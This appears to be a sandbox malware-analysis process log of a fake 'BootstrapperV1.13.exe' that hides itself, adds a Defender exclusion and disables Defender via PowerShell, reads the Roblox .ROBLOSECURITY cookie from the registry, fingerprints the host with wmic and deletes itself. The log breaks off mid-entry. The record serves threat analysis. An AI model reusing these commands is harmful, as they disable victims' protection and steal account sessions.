  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5364,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:2892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6004,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5948 /prefetch:1
  2⤵
  PID:3700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5260,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:3116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3840,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5900 /prefetch:1
  2⤵
  PID:3888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6116,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6044 /prefetch:8
  2⤵
  PID:2268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5292,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5996 /prefetch:8
  2⤵
  PID:3480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4760,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4524 /prefetch:8
  2⤵
  PID:4332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=4552,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:1768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=4524,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5856 /prefetch:1
  2⤵
  PID:2388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5744,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5956 /prefetch:1
  2⤵
  PID:2604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5024,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5792,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5832 /prefetch:1
  2⤵
  PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6152,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1448 /prefetch:1
  2⤵
  PID:1884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=5316,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6412 /prefetch:1
  2⤵
  PID:3040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=6228,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5124 /prefetch:1
  2⤵
  PID:5640

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:552

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3232

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3656

C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3496

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\5152232f1e814101b3b14bcdca6e836e /t 3616 /p 3496
1⤵
PID:4720

C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3644

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\b72c8e155e5f42598402666b7a2d6750 /t 2648 /p 3644
1⤵
PID:1632

C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4976

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\a264d63d1c384c54805c188c98eb5d47 /t 2828 /p 4976
1⤵
PID:4596

C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1512

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\aa6ce50a6879459d8c9fe08b34e15339 /t 3740 /p 1512
1⤵
PID:4344

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BootstrapperV1.13\" -ad -an -ai#7zMap29382:96:7zEvent11904
1⤵
PID:5012

C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe
"C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3988
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3768
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
  2⤵
  - Views/modifies file attributes
  PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5036
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:992
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:1592
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:1632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4796
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:3400
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3092
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultc19d36a5h1a21h4b8dha597hdd2adf13d802
1⤵
PID:3888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff8a9fd46f8,0x7ff8a9fd4708,0x7ff8a9fd4718
  2⤵
  PID:1276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,8055826488352155074,3893014645929438580,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
  2⤵
  PID:5168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,8055826488352155074,3893014645929438580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,8055826488352155074,3893014645929438580,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
  2⤵
  PID:5244

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5388

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault6501a8e4he4f6h4dc9hae93h7c38e85aff09
1⤵
PID:5788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8a9fd46f8,0x7ff8a9fd4708,0x7ff8a9fd4718
  2⤵
  PID:5800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,6782462964915964277,2833604717239166021,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
  2⤵
  PID:6048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,6782462964915964277,2833604717239166021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,6782462964915964277,2833604717239166021,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
  2⤵
  PID:6104

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5592

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault41e0dc1dh9a88h4bf6h92aahb915b728441a
1⤵
PID:5824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8a9fd46f8,0x7ff8a9fd4708,0x7ff8a9fd4718
  2⤵
  PID:5884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,9952862728277801922,10913725860415263909,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
  2⤵
  PID:1264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,9952862728277801922,10913725860415263909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,9952862728277801922,10913725860415263909,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2976 /prefetch:8
  2⤵
  PID:5440

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4760

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5860

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BootstrapperV1.13\" -ad -an -ai#7zMap31975:96:7zEvent15851
1⤵
PID:552

C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe
"C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5268
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4092
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
  2⤵
  - Views/modifies file attributes
  PID:5288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3740
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:4928
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5728
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5536
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:6076
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5636
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2904

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1384

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BootstrapperV1.13\" -ad -an -ai#7zMap12514:96:7zEvent26951
1⤵
PID:5728

C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe
"C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5160
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:2676
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
  2⤵
  - Views/modifies file attributes
  PID:1092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6104
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:5764
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5496
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3660
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:6136
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3740
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1440

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\Btop5PoYH4XxtKG\Display\Display.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5084

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:3380

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4280

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\Btop5PoYH4XxtKG\Display\Display.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4712

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4552

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BootstrapperV1.13\" -ad -an -ai#7zMap24537:96:7zEvent12184
1⤵
PID:1512

C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe
"C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:4340
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:6096
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe"
  2⤵
  - Views/modifies file attributes
  PID:5852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\BootstrapperV1.13\BootstrapperV1.13.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
